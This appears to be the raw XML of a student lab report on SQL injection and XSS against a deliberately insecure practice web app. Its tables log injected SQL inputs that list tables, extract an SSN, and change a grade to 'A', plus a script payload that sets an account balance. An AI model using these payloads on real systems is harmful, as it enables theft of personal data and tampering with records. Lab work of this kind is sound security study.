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C417" w14:textId="35EEB961" w:rsidR="00730769" w:rsidRDefault="00B1285E" w:rsidP="00B1285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Kim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224A9A8D" w14:textId="406FE443" w:rsidR="00B1285E" w:rsidRDefault="00B1285E" w:rsidP="00B1285E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SQL, XSS, &amp; CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420F1741" w14:textId="3A716305" w:rsidR="00F14B6B" w:rsidRDefault="00B1285E" w:rsidP="00365D9E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Injection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2230"/>
        <w:gridCol w:w="4037"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6FCC" w14:paraId="03B20965" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A6049E" w14:textId="33BA655A" w:rsidR="000F6FCC" w:rsidRDefault="000F6FCC" w:rsidP="000F6FC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USERID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0C0F3D" w14:textId="2F2481A0" w:rsidR="000F6FCC" w:rsidRDefault="000F6FCC" w:rsidP="000F6FC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MODIFICATIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52B1A273" w14:textId="23B39252" w:rsidR="000F6FCC" w:rsidRDefault="000F6FCC" w:rsidP="000F6FC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STAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB2EC5" w14:paraId="5357D638" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B96AA89" w14:textId="2FE7E3C1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'; show tables;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E195236" w14:textId="4BE99BF6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0C73D8FB" w14:textId="63FB581B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23:00:00 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB2EC5" w14:paraId="30D4EF49" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A0DC40" w14:textId="76D8EAB8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‘ ;select</w:t>
            </w:r>
            <w:proofErr w:type="gram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* from Database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=tkj9ep;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D2E4B08" w14:textId="51C04382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34014C32" w14:textId="19151802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23:02:00 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB2EC5" w14:paraId="507692C3" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3642B642" w14:textId="17F3A394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show * from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2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3856CE41" w14:textId="4DA3BE5C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75336A01" w14:textId="48EADE37" w:rsidR="00BB2EC5" w:rsidRPr="00365D9E" w:rsidRDefault="00BB2EC5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23:05:59 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="794BF9EF" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="151D57B3" w14:textId="19EA110F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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21BA1810" w14:textId="181D7F32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7B39F3D4" w14:textId="25F0DD7C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23:07:31 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="3259F15D" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010F1D28" w14:textId="773AED8D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* from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='tkj9ep';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BDE402D" w14:textId="4DA4DA20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5850E47A" w14:textId="32E0B431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23:09:36 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="60CF2131" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="723046E5" w14:textId="77EE0C65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* from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2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="411CAE29" w14:textId="63C2F2B9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04523530" w14:textId="112F8FF1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23:14:07 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="664D0C28" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177E9EAE" w14:textId="4F936DC7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2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F9A41F7" w14:textId="6355E34F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0BE188E2" w14:textId="5C07AE44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23:14:46 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="6CA47CEF" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D6BF23F" w14:textId="6C51EC28" w:rsidR="000411EE" w:rsidRPr="00365D9E" w:rsidRDefault="000411E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'; use Database;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71392F54" w14:textId="14E8648B" w:rsidR="000411EE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39D99E8E" w14:textId="767C214E" w:rsidR="000411EE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23:17:24 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="403F630B" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B8F46A" w14:textId="4BAC6647" w:rsidR="000411EE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'; describe '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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10857149" w14:textId="1EB1BB43" w:rsidR="000411EE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6A57AAC6" w14:textId="481630EF" w:rsidR="000411EE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23:18:47 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0EF3" w14:paraId="2054F3DE" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D162D41" w14:textId="16D847F2" w:rsidR="00AF0EF3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'; use Database;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D2DEB2" w14:textId="08A57B4C" w:rsidR="00AF0EF3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02B62277" w14:textId="09C249AA" w:rsidR="00AF0EF3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23:19:28 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0EF3" w14:paraId="207EB4BE" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE6281A" w14:textId="7FFA630A" w:rsidR="00AF0EF3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* from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='tkj9ep';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149D2F9C" w14:textId="22213E5A" w:rsidR="00AF0EF3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6D38360E" w14:textId="650CB383" w:rsidR="00AF0EF3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23:21:22 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0EF3" w14:paraId="616EDB27" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB19D98" w14:textId="41127FFC" w:rsidR="00AF0EF3" w:rsidRPr="00365D9E" w:rsidRDefault="00AF0EF3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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF7B141" w14:textId="290015C6" w:rsidR="00AF0EF3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2B57C6B5" w14:textId="7EA3D1DD" w:rsidR="00AF0EF3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23:27:45 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="022A3E51" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42EEAE97" w14:textId="17134DA4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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59ACA335" w14:textId="77CDAF39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4EFE059D" w14:textId="79617632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23:28:42 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="69860AF2" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172BCD51" w14:textId="4F992873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Database.Tables_in_insecure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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06704CAF" w14:textId="03DFB39E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1D3A8827" w14:textId="3B1B63C6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23:29:47 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="60EA4E12" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="145CA06C" w14:textId="085AC3C5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; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40830ABA" w14:textId="6F26EA62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None </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3F63F3" w14:textId="413C5690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23:31:02 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="482C80AB" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="415F09E0" w14:textId="0A06F9D8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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760AAB39" w14:textId="40BBB15D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1257AA49" w14:textId="492240F1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23:35:20 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="1E0593F7" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54DDD98A" w14:textId="3CEA69C2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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEF744B" w14:textId="0533D487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464D4965" w14:textId="6195035F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23:35:53 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="577AB09A" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617B513B" w14:textId="1AA04B65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describe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Tables_in_insecure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; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E83EA4" w14:textId="77777777" w:rsidR="00E81349" w:rsidRPr="00365D9E" w:rsidRDefault="00E8134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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B7FD3C" w14:textId="6C682958" w:rsidR="00E8134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23:37:57 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="1BE79870" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF46C28" w14:textId="0A39D354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‘; show tables -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E5FBB7" w14:textId="036F4032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7CF69CBA" w14:textId="3D2D79FA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23:41:14 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="013BB844" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25563416" w14:textId="6692470F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‘; show tables --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7718FED0" w14:textId="23A09069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14F47511" w14:textId="26FBEE91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23:42:35 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="158A97D8" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E646796" w14:textId="400FA79C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‘; describe data -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE6D25C" w14:textId="5E429CED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3E2110B4" w14:textId="1FE9B3A8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23:43:11 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="2A56A34C" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC9EA4D" w14:textId="40ACD308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* from data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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2E65BD" w14:textId="56E3EB31" w:rsidR="00AA15D9" w:rsidRPr="00365D9E" w:rsidRDefault="00AA15D9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5201CE5D" w14:textId="35109A14" w:rsidR="00AA15D9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23:48:00 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="6987F99A" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1D6248" w14:textId="454E9B3B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* from data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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B503C46" w14:textId="30948320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40251449" w14:textId="69208689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23:49:06 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="100430F7" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53A5B98B" w14:textId="5683DF62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* from data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='tkj9ep'; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17CBE3A3" w14:textId="416EE4B4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03E8AB67" w14:textId="51C786AC" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/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23:50:03 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="4061DB02" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="768FF852" w14:textId="07F87582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* from data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='tkj9ep'; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C366525" w14:textId="4ABC1D99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1DD2F085" w14:textId="266D0FBE" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7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23:50:22 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="4BB20380" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA0F7FF" w14:textId="25FFAECC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‘; describe data --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7956C627" w14:textId="5328166A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10FCC22D" w14:textId="18AD9F54" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7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23:51:39 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="1B1C82D5" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35941927" w14:textId="3D031BBC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'; describe data; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D95BB19" w14:textId="77777777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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44375DF6" w14:textId="62981AF1" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7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23:52:50 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="13DA26BF" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC363F6" w14:textId="73F22D3E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'; describe data --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41DEC330" w14:textId="2DA13B40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19F2D4CB" w14:textId="1DABABD3" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7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23:53:23 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="14B6615F" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F40A688" w14:textId="77777777" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="007116F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'; describe data --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E41A6B1" w14:textId="77777777" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="007116F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47A4B4BC" w14:textId="2B817C25" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="007116F0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23:54:10 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="3C172704" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29AAF36E" w14:textId="4198157D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grade from data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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E497A69" w14:textId="51D62184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03E9D182" w14:textId="63C8C00D" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7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23:56:26 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="3C0927B1" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4926A56F" w14:textId="0DD35D2A" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7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ssn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 from data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='tkj9ep' -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA58284" w14:textId="63E1D8E3" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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6A8CF112" w14:textId="3F78131A" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E" w:rsidP="00332CE7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Sat, 25 Mar 2023 23:57:51 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00365D9E" w14:paraId="40F86779" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F53923D" w14:textId="2C22ECDF" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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update data set grade='A'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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="041E0E72" w14:textId="5B8F95D6" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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Changed grade entry for tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="101CEE8E" w14:textId="0561A8E3" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E" w:rsidP="00332CE7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Sun, 26 Mar 2023 00:01:28 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00365D9E" w14:paraId="753C5ABE" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02DEF458" w14:textId="27721C2B" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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 xml:space="preserve">'; select grade from data where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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='tkj9ep' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E508892" w14:textId="0A7D764A" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E" w:rsidP="000F6FCC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135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32941026" w14:textId="18405A21" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E" w:rsidP="00332CE7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/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65D9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This page served at Sun, 26 Mar 2023 00:01:50 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="022EED40" w14:textId="55FC71BE" w:rsidR="000F6FCC" w:rsidRDefault="00AA15D9" w:rsidP="00AA15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 Information: SSN</w:t>
      </w:r>
      <w:r w:rsidR="00332CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00365D9E" w:rsidRPr="00365D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(109201914)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C414A0A" w14:textId="6F303F58" w:rsidR="00B11099" w:rsidRDefault="00B11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FB1472" w14:textId="6128B6AE" w:rsidR="00AA15D9" w:rsidRDefault="00B11099" w:rsidP="00B1109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XSS Scripting Attack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913622" w14:paraId="228C93B8" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAD0EEA" w14:textId="73F5EA85" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="00913622" w:rsidP="0091362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USERID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C221500" w14:textId="6BCDB30D" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="00913622" w:rsidP="0091362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TIME STAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00913622" w14:paraId="229A6063" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABDEDB8" w14:textId="52BD8F8B" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="003420DE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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2355834A" w14:textId="06212021" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="00913622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14:53:45 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003420DE" w14:paraId="403F79B1" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1021EECF" w14:textId="36D798C1" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="003420DE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&lt;script&gt;\</w:t>
            </w:r>
            <w:proofErr w:type="spell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nbalance</w:t>
            </w:r>
            <w:proofErr w:type="spell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proofErr w:type="gram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1000000;\</w:t>
            </w:r>
            <w:proofErr w:type="gram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n&lt;\script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
